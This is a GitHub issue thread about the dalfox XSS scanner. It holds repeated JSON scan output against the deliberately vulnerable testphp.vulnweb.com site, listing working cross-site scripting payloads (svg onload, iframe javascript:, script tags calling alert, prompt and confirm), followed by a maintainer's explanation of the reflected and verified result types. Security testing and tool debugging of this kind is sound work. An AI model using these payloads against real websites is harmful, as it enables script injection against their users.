You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I've been running dalfox on the same URL over and over again, here are the results:
$ dalfox --silence url http://testphp.vulnweb.com/listproducts.php --format json --worker 50
[
{"type":"G","inject_type":"BUILTIN","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?pleasedonthaveanamelikethis_plz_plz=DalFox","param":"","payload":"DalFox","evidence":"","cwe":"","severity":"Low","message_id":3,"message_str":"Found dalfox-error-mysql2 via built-in grepping / payload: DalFox"},
{"type":"V","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CdETAILS%250aopen%250aonToGgle%250a%3D%250aa%3Dprompt%2Ca%28%29+class%3Ddalfox%3E","param":"cat","payload":"\u003cdETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() class=dalfox\u003e","evidence":"48 line: yntax to use near '=\u003cdETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() class=dalfox\u003e'","cwe":"CWE-79","severity":"High","message_id":219,"message_str":"Triggered XSS Payload (found DOM Object): cat=\u003cdETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() class=dalfox\u003e"},
{}]
$ dalfox --silence url http://testphp.vulnweb.com/listproducts.php --format json --worker 50
[
{"type":"G","inject_type":"BUILTIN","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php","param":"","payload":"","evidence":"","cwe":"","severity":"Low","message_id":2,"message_str":"Found dalfox-error-mysql2 via built-in grepping / original request"},
{"type":"R","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CiFrAme%2Fsrc%3DjaVascRipt%3Aprint%281%29%3E%3C%2FiFramE%3E","param":"cat","payload":"\u003ciFrAme/src=jaVascRipt:print(1)\u003e\u003c/iFramE\u003e","evidence":"48 line: yntax to use near '=\u003ciFrAme/src=jaVascRipt:print(1)\u003e\u003c/iFramE\u003e' at line 1","cwe":"CWE-79","severity":"Medium","message_id":351,"message_str":"Reflected Payload in HTML: cat=\u003ciFrAme/src=jaVascRipt:print(1)\u003e\u003c/iFramE\u003e"},
{"type":"V","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CiFrAme%2Fsrc%3DjaVascRipt%3Aconfirm%281%29+class%3Ddalfox%3E%3C%2FiFramE%3E","param":"cat","payload":"\u003ciFrAme/src=jaVascRipt:confirm(1) class=dalfox\u003e\u003c/iFramE\u003e","evidence":"48 line: yntax to use near '=\u003ciFrAme/src=jaVascRipt:confirm(1) class=dalfox\u003e\u003c/iFramE\u003e' at","cwe":"CWE-79","severity":"High","message_id":275,"message_str":"Triggered XSS Payload (found DOM Object): cat=\u003ciFrAme/src=jaVascRipt:confirm(1) class=dalfox\u003e\u003c/iFramE\u003e"},
{}]
$ dalfox --silence url http://testphp.vulnweb.com/listproducts.php --format json --worker 50
[
{"type":"G","inject_type":"BUILTIN","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php","param":"","payload":"","evidence":"","cwe":"","severity":"Low","message_id":2,"message_str":"Found dalfox-error-mysql2 via built-in grepping / original request"},
{"type":"R","inject_type":"inHTML-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%22%3E%3CSvg%2Fonload%3Dalert%281%29+class%3Ddlafox%3E","param":"cat","payload":"\"\u003e\u003cSvg/onload=alert(1) class=dlafox\u003e","evidence":"48 line: syntax to use near '\"\u003e\u003cSvg/onload=alert(1) class=dlafox\u003e' at line 1","cwe":"CWE-79","severity":"Medium","message_id":435,"message_str":"Reflected Payload in HTML: cat=\"\u003e\u003cSvg/onload=alert(1) class=dlafox\u003e"},
{"type":"V","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CScRipt+class%3Ddalfox%3Eprompt.valueOf%28%29%281%29%3C%2Fscript%3E","param":"cat","payload":"\u003cScRipt class=dalfox\u003eprompt.valueOf()(1)\u003c/script\u003e","evidence":"48 line: yntax to use near '=\u003cScRipt class=dalfox\u003eprompt.valueOf()(1)\u003c/script\u003e' at line 1","cwe":"CWE-79","severity":"High","message_id":187,"message_str":"Triggered XSS Payload (found DOM Object): cat=\u003cScRipt class=dalfox\u003eprompt.valueOf()(1)\u003c/script\u003e"},
{}]
$ dalfox --silence url http://testphp.vulnweb.com/listproducts.php --format json --worker 50
[
{"type":"G","inject_type":"BUILTIN","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php","param":"","payload":"","evidence":"","cwe":"","severity":"Low","message_id":2,"message_str":"Found dalfox-error-mysql2 via built-in grepping / original request"},
{"type":"R","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CiFrAme%2Fsrc%3DjaVascRipt%3Aalert.bind%28%29%281%29%3E%3C%2FiFramE%3E","param":"cat","payload":"\u003ciFrAme/src=jaVascRipt:alert.bind()(1)\u003e\u003c/iFramE\u003e","evidence":"48 line: yntax to use near '=\u003ciFrAme/src=jaVascRipt:alert.bind()(1)\u003e\u003c/iFramE\u003e' at line 1","cwe":"CWE-79","severity":"Medium","message_id":343,"message_str":"Reflected Payload in HTML: cat=\u003ciFrAme/src=jaVascRipt:alert.bind()(1)\u003e\u003c/iFramE\u003e"},
{"type":"V","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CsVg%2Fonload%3Dprompt.valueOf%28%29%281%29+class%3Ddalfox%3E","param":"cat","payload":"\u003csVg/onload=prompt.valueOf()(1) class=dalfox\u003e","evidence":"48 line: yntax to use near '=\u003csVg/onload=prompt.valueOf()(1) class=dalfox\u003e' at line 1","cwe":"CWE-79","severity":"High","message_id":163,"message_str":"Triggered XSS Payload (found DOM Object): cat=\u003csVg/onload=prompt.valueOf()(1) class=dalfox\u003e"},
{}]
$ dalfox --silence url http://testphp.vulnweb.com/listproducts.php --format json --worker 50
[
{"type":"G","inject_type":"BUILTIN","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php","param":"","payload":"","evidence":"","cwe":"","severity":"Low","message_id":2,"message_str":"Found dalfox-error-mysql2 via built-in grepping / original request"},
{"type":"V","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CScRipt+class%3Ddalfox%3Econfirm%281%29%3C%2Fscript%3E","param":"cat","payload":"\u003cScRipt class=dalfox\u003econfirm(1)\u003c/script\u003e","evidence":"48 line: yntax to use near '=\u003cScRipt class=dalfox\u003econfirm(1)\u003c/script\u003e' at line 1","cwe":"CWE-79","severity":"High","message_id":175,"message_str":"Triggered XSS Payload (found DOM Object): cat=\u003cScRipt class=dalfox\u003econfirm(1)\u003c/script\u003e"},
{}]
As you can see, the reflected XSS does not show up across all the runs. Any ideas why ?
Environment
Dalfox Version: latest
Installed from: go install -v github.com/hahwul/dalfox/v2@latest
The text was updated successfully, but these errors were encountered:
Hi @ocervell
Dalfox does not output R type if the vulnerability is identified as V type. Looking at the information you sent, it seems that all V types are included.
The reason why the R type is not printed when checking with V type is to prevent indiscriminate R output. Sometimes, Although it is a V type, the R output is caused by fast concurrency processing.
R: Found payload reflection.
V: DOM Parser, Headless Browser confirms that actual attack code is likely to be injected and executed
In most cases, the V Type check is preceded by the R Type check.
Describe the bug
I've been running
dalfox
on the same URL over and over again, here are the results:As you can see, the reflected XSS does not show up across all the runs. Any ideas why ?
Environment
The text was updated successfully, but these errors were encountered: